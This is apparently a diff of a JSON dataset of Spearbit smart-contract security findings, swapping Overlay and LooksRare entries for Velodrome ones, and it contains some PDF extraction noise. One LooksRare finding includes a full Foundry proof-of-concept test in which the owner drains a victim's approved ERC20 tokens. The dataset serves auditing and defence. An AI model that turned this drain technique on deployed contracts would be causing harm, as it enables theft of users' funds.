x -= Math.min(x,y); (note, there is an extra - in -= ) It is easy to make a mistake because both constructs are rather similar. Note: No mistakes have been found in the code. Examples to get the smallest of two values: OverlayV1Market.sol: tradingFee OverlayV1Market.sol: cap OverlayV1Market.sol: cap = Math.min(tradingFee, value); = Math.min(cap, circuitBreaker(snapshot, cap)); = Math.min(cap, backRunBound(data)); Examples to make sure the resulting value is >=0: OverlayV1Market.sol: oiLong -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares OverlayV1Market.sol: pos.notional OverlayV1Market.sol: pos.debt OverlayV1Market.sol: pos.oiShares OverlayV1Market.sol: oiLong oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares Position.sol: posCost -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= uint120( Math.min(pos.notional, pos.notionalInitial(fraction))); -= uint120( Math.min(pos.debt, pos.debtCurrent(fraction))); -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= Math.min(posCost, posDebt);", + "title": "Unnecessary slippage loss due to AutoCompounder selling VELO", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "AutoCompounder allows every address to help claim the rewards and compound to the locked VELO position. The AutoCompounder will sell _tokensToSwap into VELO. By setting VELO as _tokensToSwap, the AutoCompounder would do unnecessary swaps that lead to unnecessary slippage loss.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Confusing use of term burn", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function oiAfterFunding() contains a comment that it burns a portion of the contracts. The term burn can be confused with burning of OVL. The Overlay team clarified that: The total aggregate open interest outstanding (oiLong + oiShort) on the market decreases over time with funding. Theres no actual burning of OVL. function oiAfterFunding(...) ... { ... // Burn portion of all aggregate contracts (i.e. oiLong + oiShort) // to compensate protocol for pro-rata share of imbalance liability ... return (oiOverweightNow, oiUnderweightNow); }", + "title": "epochVoteStart function calls the wrong library method", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The epochVoteStart function calls the VelodromeTimeLibrary.epochStart function instead of the VelodromeTimeLibrary.epochVoteStart function.
Thus, the Voter.epochVoteStart function returns a voting start time without factoring in the one-hour distribution window, which might cause issues for users and developers relying on this information.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Document precondition for oiAfterFunding()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Function oiAfterFunding contains the following statement: uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; Nevertheless, if oiOverweightBefore < oiUnderweightBefore then statement will revert. Luckily, the update() function makes sure this isnt the case. function oiAfterFunding(uint256 oiOverweightBefore, uint256 oiUnderweightBefore, ...) ... { ... uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; // Could if oiOverweightBefore < oiUnderweightBefore ... } function update() public returns (Oracle.Data memory) { ... bool isLongOverweight = oiLong > oiShort; uint256 oiOverweight two uint256 oiUnderweight = isLongOverweight ? oiShort : the two (oiOverweight, oiUnderweight) = oiAfterFunding(oiOverweight, oiUnderweight, ...); ... = isLongOverweight ? oiLong : oiShort; // oiOverweight is the largest of the oiLong; // oiUnderweight is the smallest of ,! ,! }", + "title": "Managed NFT can vote more than once per epoch under certain circumstances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The owner of the managed NFT could break the invariant that an NFT can only vote once per epoch. Assume Bob owns the following two (2) managed NFTs: Managed veNFT (called mNFTa) with one (1) locked NFT (called lNFTa) Managed veNFT (called mNFTb) with one (1) locked NFT (called lNFTb) The balance of lNFTa and lNFTb is the same. Bob voted on poolx with mNFTa and mNFTb in the first hour of the epoch. In the last two hours of the voting window of the current epoch, Bob changed his mind and decided to vote on pooly. Under normal circumstances, the onlyNewEpoch modifier will prevent mNFTa and mNFTb from triggering the Voter.vote function because these two veNFTs have already voted in the current epoch and their lastVoted is set to a timestamp within the current epoch. However, it is possible for Bob to bypass this control. Bob could call the Voter.withdrawManaged function to withdraw lNFTa and lNFTb from mNFTa and mNFTb respectively. Since the weight becomes zero, the lastVoted for both mNFTa and mNFTb will be cleared. As a result, they will be allowed to re-vote in the current epoch. Bob will call Voter.depositManaged to deposit lNFTb into mNFTa and lNFTa into mNFTb respectively to increase the weight of the managed NFTs. Bob then calls Voter.vote with mNFTa and mNFTb to vote on pooly. Since the lastVoted is empty (cleared earlier), the onlyNewEpoch modifier will not revert the transaction. The team understood that without clearing the lastVoted, it would lead to another potential issue where a new managed NFT could potentially be made useless temporarily for an epoch.
Given that the managed NFT grants significant power to the owner, the team intended to restrict access to the managed NFTs and manage abuse by utilizing the emergency council/governor to deactivate non-compliant managed NFTs, thus mitigating the risks of this issue.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Format numbers intelligibly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Solidity offers several possibilities to format numbers in a more readable way as noted below.", + "title": "Invalid route is returned if token does not have a trading pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Assume that someone called the getOptimalTokenToVeloRoute function with a token called T that does not have a trading pool within Velodrome. While looping through all the ten routes pre-defined in the constructor at Line 94 below, since the trading pool with T does not exist, it will keep skipping to the next route until the loop ends. As such, the index remains uninitialized at the end, meaning it holds the default value of zero. In Lines 110 to 112, it will conclude that the optimal route is as follows: routes[0] = routesTokenToVelo[index][0] = routesTokenToVelo[0][0] = address(0) <> USDC routes[1] = routesTokenToVelo[index][1] = routesTokenToVelo[0][1] = USDC <> VELO routes[0].from = token = T routes = T <> USDC <> VELO As a result, the getOptimalTokenToVeloRoute function returns an invalid route. function getOptimalTokenToVeloRoute( address token, uint256 amountIn ) external view returns (IRouter.Route[] memory) { // Get best route from multi-route paths uint256 index; uint256 optimalAmountOut; IRouter.Route[] memory routes = new IRouter.Route[](2); uint256[] memory amountsOut; // loop through multi-route paths for (uint256 i = 0; i < 10; i++) { routes[0] = routesTokenToVelo[i][0]; // Go to next route if a trading pool does not exist if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) continue; ,! routes[1] = routesTokenToVelo[i][1]; // Set the from token as storage does not have an address set routes[0].from = token; amountsOut = router.getAmountsOut(amountIn, routes); // amountOut is in the third index - 0 is amountIn and 1 is the first route output uint256 amountOut = amountsOut[2]; if (amountOut > optimalAmountOut) { // store the index and amount of the optimal amount out optimalAmountOut = amountOut; index = i; } } // use the optimal route determined from the loop routes[0] = routesTokenToVelo[index][0]; routes[1] = routesTokenToVelo[index][1]; routes[0].from = token; // Get amountOut from a direct route to VELO IRouter.Route[] memory route = new IRouter.Route[](1); route[0] = IRouter.Route(token, velo, false, factory); amountsOut = router.getAmountsOut(amountIn, route); // compare output and return the best result return amountsOut[1] > optimalAmountOut ? route : routes; }", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "The Protocol owner can drain users' currency tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The Protocol owner can drain users' currency tokens that have been approved to the protocol.
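A minimal Python sketch of the control flow in getOptimalTokenToVeloRoute above (the route table and pool lookup are faked; all names here are illustrative): when every candidate route is skipped, index keeps its zero default and slot 0 is returned even though it was never validated.

# If no trading pool exists for `token`, every iteration hits `continue`,
# `index` is never assigned, and the route at slot 0 is returned anyway.
ROUTES_TOKEN_TO_VELO = [("USDC", "VELO"), ("WETH", "VELO")]  # stand-in table

def pool_exists(token, other):
    return False  # token T has no trading pool at all

def get_optimal_route(token):
    index = 0  # mirrors Solidity's zero default for `uint256 index`
    for i, (mid, _velo) in enumerate(ROUTES_TOKEN_TO_VELO):
        if not pool_exists(token, mid):
            continue  # taken for every i, so index is never updated
        index = i     # the amountsOut comparison would happen here
    mid, velo = ROUTES_TOKEN_TO_VELO[index]  # falls through with index == 0
    return [(token, mid), (mid, velo)]

print(get_optimal_route("T"))  # [('T', 'USDC'), ('USDC', 'VELO')] -- an invalid route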
Makers who want to bid on NFTs would need to approve their currency token to be spent by the protocol. The owner should not be able to access these funds for free. The owner can drain the funds as follows: 1. Calls addTransferManagerForAssetType and assigns the currency token as the transferManagerForAs- setType and IERC20.transferFrom.selector as the selectorForAssetType for a new assetType. 2. Signs an almost empty MakerAsk order and sets its collection as the address of the targeted user and the assetType to the newly created assetType. The owner also creates the corresponding TakerBid by setting the recipient field to the amount of currency they would like to transfer. 3. Calls the executeTakerBid endpoint with the above data without a merkleTree or affiliate. // file: test/foundry/Attack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; contract NullStrategy is IBaseStrategy { function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function executeNull( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external pure returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) {} } 5 contract AttackTest is ProtocolBase { NullStrategy private nullStrategy; MockERC20 private mockERC20; uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); looksRareProtocol.initiateOwnershipTransfer(signingOwner); // This particular strategy is not a requirement of the exploit. nullStrategy = new NullStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, NullStrategy.executeNull.selector, false, address(nullStrategy) ); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); vm.stopPrank(); vm.prank(signingOwner); looksRareProtocol.confirmOwnershipTransfer(); } function testDrain() public { vm.prank(victimUser); mockERC20.approve(address(looksRareProtocol), 1000); vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(mockERC20), mockERC20.transferFrom.selector ); OrderStructs.MakerAsk memory makerAsk = _createSingleItemMakerAskOrder({ // null strategy askNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // ERC20 asset! 
orderNonce: 0, collection: victimUser, // <--- will be used as the `from` currency: address(0), signer: signingOwner, minPrice: 0, itemId: 1 }); 6 bytes memory signature = _signMakerAsk(makerAsk, signingOwnerPK); OrderStructs.TakerBid memory takerBid = OrderStructs.TakerBid( address(1000), // `amount` field for the `transferFrom` 0, makerAsk.itemIds, makerAsk.amounts, bytes(\"\") ); looksRareProtocol.executeTakerBid( takerBid, makerAsk, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); vm.stopPrank(); assertEq(mockERC20.balanceOf(signingOwner), 1000); assertEq(mockERC20.balanceOf(victimUser), 0); } }", + "title": "SafeApprove is not used in AutoCompounder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "safeApprove is not used in AutoCompounder. Tokens that do not follow standard ERC20 will be locked in the contract.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink will often revert due to stale prices", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The FloorFromChainlink strategy inherits from BaseStrategyChainlinkPriceLatency, so it can have a maxLatency of at most 3600 seconds. However, all of the chainlink mainnet floor price feeds have a heartbeat of 86400 seconds (24 hours), so the chainlink strategies will revert with the PriceNotRecentEnough error quite often. At the time of writing, every single mainnet floor price feed has an updateAt timestamp well over 3600 seconds in the past, meaning the strategy would always revert for any mainnet price feed right now. This may have not been realized earlier because the Goerli floor price feeds do have a heartbeat of 3600, but the mainnet heartbeat is much less frequent. One of the consequences is that users might miss out on exchanges they would have accepted. For example, if a taker bid is interested in a maker ask with an eth premium from the floor, in the likely scenario where the taker didn't log-in within 1 hour of the last oracle update, the strategy will revert and the exchange won't happen even though both parties are willing. If the floor moves up again the taker might not be interested anymore. The maker will have lost out on making a premium from the floor, and the taker would have lost out on the exchange they were willing to make.", + "title": "balanceOfNFT can be made to return non-zero value via split and merge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Ownership Change Sidestep via Split. Splitting allows to change the ID, and have it work. This allows to sidestep this check in VotingEscrow.sol#L1052-L1055 Meaning you can always have a non-zero balance although it requires performing some work. This could be used by integrators as a way to accurately track their own voting power.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Medium Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "minPrice and maxPrice should reflect the allowed regions for the funds to be transferred from the bidder to the ask recipient", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "1. 
When a maker or taker sets a minPrice for an ask, the protocol should guarantee the funds they receive is at minimum the minPrice amount (currently not enforced). 2. Also reversely, when a maker or taker sets a maxPrice for a bid, the protocol should guarantee that the amount they spend is at maximum maxPrice (currently enforced). For 1. the current protocol-controlled deviation can be 30% maximum (sum of fees sent to the creator, the protocol fee recipient, and an affiliate).", + "title": "delegateBySig can use malleable signatures", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because the function delegateBySig uses ecrecover and doesn't check the value of the signature, other signatures with higher numerical values that map to the same signer could be used. Because the code uses nonces, only one signature can be used per nonce.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "StrategyItemIdsRange does not invalidate makerBid.amounts[0] == 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyItemIdsRange does not check whether makerBid.amounts[0] is zero or not. If it was 0, the taker can provide empty itemIds and amounts which will cause the for loop to be skipped. The check below will also be successful since both amounts are 0: if (totalOfferedAmount != desiredAmount) { revert OrderInvalid(); } Depending on the used implementation of a transfer manager for the asset type used in this order, we might end up with the taker taking funds from the maker without providing any NFT tokens. The current implementation of TransferManager does check whether the provided itemIds have length 0 and it would revert in that case. One difference between this strategy and others are that all strategies including this one do check to revert if an amount for a specific itemId is 0 (and some of them have loops but the length of those loops depends on the parameters from the maker which enforce the loop to run at least once), but for this strategy if no itemIds are provided by the taker, the loop is skipped and one does not check whether the aggregated amount is 0 or not.", + "title": "Slightly Reduced Voting Power due to Rounding Error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because of rounding errors, a fully locked NFT will incur a slight loss of Vote Weight (around 27 BPS).
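To make the delegateBySig malleability above concrete: for a valid secp256k1 signature (v, r, s), the encoding with s replaced by n - s (and the recovery id flipped) recovers the same signer, which is why common ECDSA wrappers require s to lie in the lower half of the curve order. A small self-contained Python illustration (the sample s value is arbitrary):

# n is the secp256k1 group order. For a signature (v, r, s), (v', r, n - s)
# is a second, equally valid encoding; a low-s check accepts only one of them.
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

s = 0x1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF
s_mall = N - s                       # the malleated twin ecrecover also accepts
v, v_mall = 27, 28                   # recovery id flips between the two encodings

assert (s + s_mall) % N == 0                 # both map to the same signer
assert (s <= N // 2) != (s_mall <= N // 2)   # enforcing low-s rejects exactly one
print(hex(s_mall))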
[PASS] testCompareYieldOne() (gas: 4245851) Logs: distributor.claimable(tokenId) 0 locked.amount 1000000000000000000000000 block.timestamp 1814399 block.timestamp 1900800 Epoch 2 distributor.claimable(tokenId) 0 locked.amount 1000000000000000000000000 escrow.userPointHistory(tokenId, 1) 0 escrow.userPointHistory(tokenId, 1) 1814399 escrow.userPointHistory(tokenId, 1) BIAS 997260281900050656907546 escrow.userPointHistory(tokenId, tokenId2) 1814399 escrow.userPointHistory(tokenId, tokenId2) BIAS 997260281900050656907546 userPoint.ts 1814399 getCursorTs(tokenId) 1814400 userPoint.ts 1814399 epochStart(tokenId) 1814400 userPoint.ts 1814399 ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1) 997260281900050656907546 function getCursorTs(uint256 tokenId) internal returns(uint256) { IVotingEscrow.UserPoint memory userPoint = escrow.userPointHistory(tokenId, 1); console2.log(\"userPoint.ts\", userPoint.ts); uint256 weekCursor = ((userPoint.ts + WEEK - 1) / WEEK) * WEEK; uint256 weekCursorStart = weekCursor; return weekCursorStart; } function epochStart(uint256 timestamp) internal pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK); } } function testCompareYieldOne() public { skipToNextEpoch(1 days); // Epoch 1 skipToNextEpoch(-1); // last second VELO.approve(address(escrow), TOKEN_1M * 2); uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME); uint256 tokenId2 = escrow.createLock(TOKEN_1M, 4 * 365 * 86400); uint256 mTokenId = escrow.createManagedLockFor(address(this)); console2.log(\"distributor.claimable(tokenId)\", distributor.claimable(tokenId)); console2.log(\"locked.amount\", escrow.locked(tokenId).amount); console2.log(\"block.timestamp\", block.timestamp); minter.updatePeriod(); // Update for 1 skipToNextEpoch(1 days); // Go next epoch minter.updatePeriod(); // and update 2 console2.log(\"block.timestamp\", block.timestamp); console2.log(\"Epoch 2\"); //@audit here we have claimable for tokenId and mTokenId IVotingEscrow.LockedBalance memory locked = escrow.locked(tokenId); console2.log(\"distributor.claimable(tokenId)\", distributor.claimable(tokenId)); console2.log(\"locked.amount\", escrow.locked(tokenId).amount); console2.log(\"escrow.userPointHistory(tokenId, 1)\", escrow.userPointHistory(tokenId, 0).ts); console2.log(\"escrow.userPointHistory(tokenId, 1)\", escrow.userPointHistory(tokenId, 1).ts); console2.log(\"escrow.userPointHistory(tokenId, 1) BIAS\", escrow.userPointHistory(tokenId, 1).bias); console2.log(\"escrow.userPointHistory(tokenId, tokenId2)\", escrow.userPointHistory(tokenId2, 1).ts); console2.log(\"escrow.userPointHistory(tokenId, tokenId2) BIAS\", escrow.userPointHistory(tokenId2, 1).bias); console2.log(\"getCursorTs(tokenId)\", getCursorTs(tokenId)); console2.log(\"epochStart(tokenId)\", epochStart(getCursorTs(tokenId))); console2.log(\"ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)\", escrow.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)); }", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "TransferManager's owner can block token transfers for LooksRareProtocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In general, a deployed TransferManager (T) and a deployed LooksRareProtocol (L) might have two different owners (OT, OL). 
Assume TransferManager is used for asset types 0 and 1 (ERC721, ERC1155) in LooksRareProtocol and TransferManager has marked the LooksRareProtocol as an allowed operator. At any point, OT can call removeOperator to block L from calling T. If that happens, OL would need to add new (virtual) asset types (not 0 or 1) and the corresponding transfer managers for them. Makers would need to resign their orders with new asset types. Moreover, if LooksRare applies their solution for the following issue \"The Protocol owner can drain users' currency tokens\" through PR 308, which removes the ability of OL to add new asset types, then the whole protocol would need to be redeployed, since all order executions would revert.", + "title": "Some setters cannot be changed by governance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "It was found that some setters, related to emergencyCouncil and Team, can only be called by the current role owner. It may be best to allow Governance to also be able to call such setters as a way to allow it to override or replace a misaligned team. The Emergency Council can kill gauges, preventing those gauges from receiving emissions. Voter.sol#L151-L155. function setEmergencyCouncil(address _council) public { if (_msgSender() != emergencyCouncil) revert NotEmergencyCouncil(); if (_council == address(0)) revert ZeroAddress(); emergencyCouncil = _council; } The team can simply change the ArtProxy, which is a cosmetic aspect of Voting Escrow. VotingEscrow.sol#L241-L245 function setTeam(address _team) external { if (_msgSender() != team) revert NotTeam(); if (_team == address(0)) revert ZeroAddress(); team = _team; }", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token. If an operator (approved by a user) sends a 0 amount for an itemId in the context of transferring an ERC721 token, TransferManager would perform those transfers, even though the logic in the operator might have meant to avoid those transfers.", + "title": "Rebase Rewards distribution is shifted by one week, allowing new depositors to receive unfair yield initially (which they'll give back after they withdraw)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The finding is not particularly dangerous, but it is notable that because Reward will allow claiming of rewards on the following Epoch, and because Rebase rewards from the Distributor (Distributor.claim) are distributed based on the balance at the last second of the previous epoch, a desynchronization in how rewards are distributed will happen. This will end up being fair in the long run; however, here's an illustrative scenario: Locker A has a small lock and wishes to increase the amount they have locked. They increase the amount but miss out on rebase rewards (because they are based on their balance at the last second of the previous epoch). 
They decide to depositManaged, which will distribute rewards based on their current balance, meaning they will \"steal\" a marginal part of the yield. The next epoch, their weight will help increase the yield for everyone, and because Rebasing Rewards are distributed with a week of delay, they will eventually miss out on a similar proportion of yield they \"stole\".", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "The maker cannot enforce the number of times a specific order can be fulfilled for custom strategies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When a maker signs an order with a specific strategy, it leaves it up to the strategy to decide how many times this specific order can be fulfilled. The strategy's logic on how to decide on the returned isNonceInvalidated value can be complex in general and might be prone to errors (or have backdoors). The maker should be able to directly enforce at least an upper bound for the maximum number of fulfills for an order to avoid unexpected expenditure.", + "title": "AutoCompounder can be created without admin", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Creating an AutoCompounder contract without an _admin by passing address(0) through AutoCompounderFactory is possible. This will break certain functionalities in the AutoCompounder.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "A strategy can potentially reduce the value of a token before it gets transferred to a maker when a taker calls executeTakerAsk", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "When executeTakerAsk is called by a taker, a (signed by maker) strategy will be called: (bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid) ); Note that this is a stateful call. This call is performed before the NFT token is transferred to the maker (signer). Even though the strategy is fixed by the maker (since the strategyId has been signed), the strategy's implementation might involve a complex logic that might allow (if the strategy colludes with the taker somehow) a derivative token (that is owned by / linked to the to-be-transferred token) to be reattached to another token (think of accessories for an NFT character token in a game). And so the value of the to-be-transferred token would be reduced in that sense. A maker would not be able to check for this linked derivative token ownership during the transaction since there is no post-transfer hook for the maker (except in one special case when the token involved is ERC1155 and the maker is a custom contract). Also, note that all the implemented strategies would not alter the state when they are called (their endpoints have a pure or a view visibility). There is an exception to this in the StrategyTestMultiFillCollectionOrder test contract.", + "title": "claim and claimMany functions will revert when called in end lock time", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "
If _timestamp == _locked.end, then depositFor() will be called, but this will revert as block.timestamp >= oldLocked.end.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "An added transfer manager cannot get deactivated from the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Once a transfer manager for an asset type gets added to the protocol either through the constructor or through addTransferManagerForAssetType, if at some point there is malicious behavior involved with the transfer manager, there is no mechanism for the protocol's owner to deactivate the transfer manager (similar to how strategies can be deactivated). If TransferManager is used for an asset type, on the TransferManager side the owner can break the link between the operator (the LooksRare protocol potentially) and the TransferManager, but not the other way around.", + "title": "Malicious Pool Factory can be used to prevent new pools from being voted on as well as brick voting locks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because gauges[_pool] can only be set once in the voter, governance has the ability to introduce a malicious factory that will revert on command as a way to prevent normal protocol functionality, as well as prevent depositors that voted on these from ever being able to unlock their NFTs (ve.withdraw requires not having voted). To remove a vote, reset is called, which in turn calls IReward(gaugeToFees[gauges[_pool]])._withdraw(uint256(_votes), _tokenId);. If a malicious gaugeToFees contract is deployed, the tokenId won't ever be able to set voted to false, preventing it from ever withdrawing.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "Temporary DoS is possible in case orders are using tokens with blacklists", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the process of settling orders, _transferFungibleTokens is being called at max 4 times. In case one of these calls fails, the entire transaction fails. It can only fail when an ERC20 token is used for the trade, but since contracts are whitelisted in the system and probably vetted by the team, it's safe to say it's less probable that the receiver will have the ability to revert the entire transaction, although it is possible for contracts that implement a transferAndCall pattern. However, there's still the issue of transactions being reverted due to blacklistings (which have become more popular in the last year). In order to better assess the risk, let's elaborate more on the 4 potential recipients of a transaction: 1. affiliate - The risk can be easily mitigated by proper handling at the front-end level. If the transaction fails due to the affiliate's address, the taker can specify address(0) as the affiliate. 2. recipient - If the transaction fails due to the recipient's address, it can only impact the taker in a gas-griefing way. 3. protocol - If the transaction fails due to the protocol's address, its address might be updated by the contract owner in the worst case. 4. 
creator - If the transaction fails due to the creator's address, it cannot be changed directly, but in the worst case creatorFeeManager can be changed.", + "title": "Pool will stop working if a pausable / blockable token is blocked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Some tokens are pausable or implement a block list (e.g. USDC). If such a token is part of a Pool and the token is blocked or paused, the Pool will stop working. It's important to notice that the LP token, which wraps a deposit, will still be transferable, and the composability with Gauges and Reward Contracts will not be broken even when the pool is unable to function.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "viewCreatorFeeInfo's reversion depends on order of successful calls to collection.royaltyInfo", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The outcome of the call to viewCreatorFeeInfo for both CreatorFeeManagerWithRebates and CreatorFeeManagerWithRoyalties is dependent on the order of itemIds. Assume we have 2 itemIds with the following properties: itemId x where the call to collection.royaltyInfo(x, price) is successful (status == 1) and returns (a, ...) where a != 0. itemId y where the call to collection.royaltyInfo(y, price) fails (status == 0). Then if itemIds provided to viewCreatorFeeInfo is: [x, y], the call to viewCreatorFeeInfo returns successfully, as the outcome for y will be ignored/skipped. [y, x], the call to viewCreatorFeeInfo reverts with BundleEIP2981NotAllowed(collection), since the first item will be skipped and so the initial value for creator will not be set and remains address(0), but when we process the loop for x, we end up comparing a with address(0), which causes the revert.", + "title": "Use ClonesWithImmutableArgs in AutoCompounderFactory saves gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The AutoCompounderFactory can utilize ClonesWithImmutableArgs to deploy new AutoCompounder contracts. This would save a lot of gas compared to the current implementation.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Low Risk" + "Velodrome", + "Severity: Gas Optimization" ] }, { - "title": "CreatorFeeManagerWithRebates.viewCreatorFeeInfo reversion is dependent on the order of itemIds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Assume there is an itemId x where collection.royaltyInfo(x, price) returns (0, _) and another itemId y where collection.royaltyInfo(y, price) returns (a, _) where a != 0. 
